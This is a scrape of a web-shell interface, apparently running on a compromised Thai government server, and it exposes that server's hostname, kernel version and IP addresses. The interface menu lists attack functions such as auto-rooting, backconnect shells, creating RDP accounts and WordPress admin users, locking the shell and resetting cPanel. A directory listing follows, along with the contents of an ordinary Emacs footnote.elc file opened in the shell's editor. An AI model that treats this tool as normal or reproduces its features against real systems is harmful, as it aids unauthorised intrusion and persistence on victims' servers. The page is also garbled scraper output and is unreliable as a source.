Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
mail /
[ HOME SHELL ]
Name
Size
Permission
Action
binhex.elc
9.01
KB
-rw-r--r--
blessmail.el
2.51
KB
-rw-r--r--
emacsbug.elc
7.55
KB
-rw-r--r--
feedmail.elc
79.59
KB
-rw-r--r--
footnote.elc
21.09
KB
-rw-r--r--
hashcash.elc
10.81
KB
-rw-r--r--
mail-extr.elc
33.9
KB
-rw-r--r--
mail-hist.elc
13.74
KB
-rw-r--r--
mail-utils.elc
9.55
KB
-rw-r--r--
mailabbrev.elc
13.96
KB
-rw-r--r--
mailalias.elc
13.52
KB
-rw-r--r--
mailclient.elc
3.56
KB
-rw-r--r--
mailheader.elc
5.92
KB
-rw-r--r--
mailpost.elc
2.3
KB
-rw-r--r--
metamail.elc
4.44
KB
-rw-r--r--
mspools.elc
7.25
KB
-rw-r--r--
reporter.elc
9.65
KB
-rw-r--r--
rfc2368.elc
2.46
KB
-rw-r--r--
rfc822.elc
5.71
KB
-rw-r--r--
rmail-spam-filter.elc
13.24
KB
-rw-r--r--
rmail.elc
113.93
KB
-rw-r--r--
rmailedit.elc
8.83
KB
-rw-r--r--
rmailkwd.elc
5.12
KB
-rw-r--r--
rmailmm.elc
11.05
KB
-rw-r--r--
rmailmsc.elc
1.56
KB
-rw-r--r--
rmailout.elc
15.73
KB
-rw-r--r--
rmailsort.elc
6.33
KB
-rw-r--r--
rmailsum.elc
52.51
KB
-rw-r--r--
sendmail.elc
51.72
KB
-rw-r--r--
smtpmail.elc
21.58
KB
-rw-r--r--
supercite.elc
58.99
KB
-rw-r--r--
uce.elc
7.66
KB
-rw-r--r--
undigest.elc
7.88
KB
-rw-r--r--
unrmail.elc
4.69
KB
-rw-r--r--
uudecode.elc
6.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : footnote.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:21 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/mail/footnote.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file contains utf-8 non-ASCII characters ;;; and therefore cannot be loaded into Emacs 21 or earlier. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "23"))) (error "`footnote.el' was compiled for Emacs 23 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (custom-declare-group 'footnote nil "Support for footnotes in mail and news messages." :version "21.1" :group 'message) #@54 String to display in modes section of the mode-line. (custom-declare-variable 'footnote-mode-line-string '" FN" '(#$ . 732) :group 'footnote) #@53 Hook functions run when footnote-mode is activated. (custom-declare-variable 'footnote-mode-hook 'nil '(#$ . 880) :type 'hook :group 'footnote) #@68 If non-nil, narrow to footnote text body while editing a footnote. (custom-declare-variable 'footnote-narrow-to-footnotes-when-editing 'nil '(#$ . 1030) :type 'boolean :group 'footnote) #@93 If non-nil, prompt before deleting a footnote. There is currently no way to undo deletions. (custom-declare-variable 'footnote-prompt-before-deletion 't '(#$ . 1222) :type 'boolean :group 'footnote) #@134 If non-nil, insert an empty line between footnotes. Customizing this variable has no effect on buffers already displaying footnotes. (custom-declare-variable 'footnote-spaced-footnotes 't '(#$ . 1428) :type 'boolean :group 'footnote) #@63 If non-nil, assume Footnoting will be done in `message-mode'. (custom-declare-variable 'footnote-use-message-mode 't '(#$ . 1668) :type 'boolean :group 'footnote) #@144 Number of spaces separating a footnote body tag and its text. Customizing this variable has no effect on buffers already displaying footnotes. (custom-declare-variable 'footnote-body-tag-spacing '2 '(#$ . 1838) :type 'integer :group 'footnote) #@75 *When not using `message-mode', the prefix to bind in `mode-specific-map' (defvar footnote-prefix [(control 99) 33] (#$ . -2088)) #@245 Tag inserted at beginning of footnote section. If you set this to the empty string, no tag is inserted and the value of `footnote-section-tag-regexp' is ignored. Customizing this variable has no effect on buffers already displaying footnotes. (custom-declare-variable 'footnote-section-tag '"Footnotes: " '(#$ . 2225) :type 'string :group 'footnote) #@217 Regexp which indicates the start of a footnote section. This variable is disregarded when `footnote-section-tag' is the empty string. Customizing this variable has no effect on buffers already displaying footnotes. (custom-declare-variable 'footnote-section-tag-regexp '"Footnotes\\(\\[.\\]\\)?: " '(#$ . 2583) :type 'regexp :group 'footnote) #@172 String used to denote start of numbered footnote. Should not be set to the empty string. Customizing this variable has no effect on buffers already displaying footnotes. (custom-declare-variable 'footnote-start-tag '"[" '(#$ . 2934) :type 'string :group 'footnote) #@170 String used to denote end of numbered footnote. Should not be set to the empty string. Customizing this variable has no effect on buffers already displaying footnotes. (custom-declare-variable 'footnote-end-tag '"]" '(#$ . 3207) :type 'string :group 'footnote) #@40 *String used to recognize .signatures. (defvar footnote-signature-separator (byte-code "\301\300!\203 \207\302\207" [message-signature-separator boundp "^-- $"] 2) (#$ . -3475)) #@67 Footnote style represented as an index into footnote-style-alist. (defvar footnote-style-number nil (#$ . 3661)) (make-variable-buffer-local 'footnote-style-number) #@66 List of markers pointing to text of footnotes in message buffer. (defvar footnote-text-marker-alist nil (#$ . 3832)) (make-variable-buffer-local 'footnote-text-marker-alist) #@66 List of markers pointing to footnote pointers in message buffer. (defvar footnote-pointer-marker-alist nil (#$ . 4012)) (make-variable-buffer-local 'footnote-pointer-marker-alist) #@52 Text property name to enable mouse over highlight. (defvar footnote-mouse-highlight 'highlight (#$ . 4198)) #@60 Variable indicating whether footnote minor mode is active. (defvar footnote-mode nil (#$ . 4312)) (make-variable-buffer-local 'footnote-mode) #@20 Regexp for digits. (defconst footnote-numeric-regexp "[0-9]+" (#$ . 4460)) #@61 Numeric footnote style. Use Arabic numerals for footnoting. (defalias 'Footnote-numeric #[(n) "\301!\207" [n int-to-string] 2 (#$ . 4541)]) #@30 Upper case English alphabet. (defconst footnote-english-upper "ABCDEFGHIJKLMNOPQRSTUVWXYZ" (#$ . 4688)) #@41 Regexp for upper case English alphabet. (defconst footnote-english-upper-regexp "[A-Z]+" (#$ . 4798)) #@104 Upper case English footnoting. Wrapping around the alphabet implies successive repetitions of letters. (defalias 'Footnote-english-upper #[(n) "\306S G\"S G\245\307 \nH!\310\311Y\203&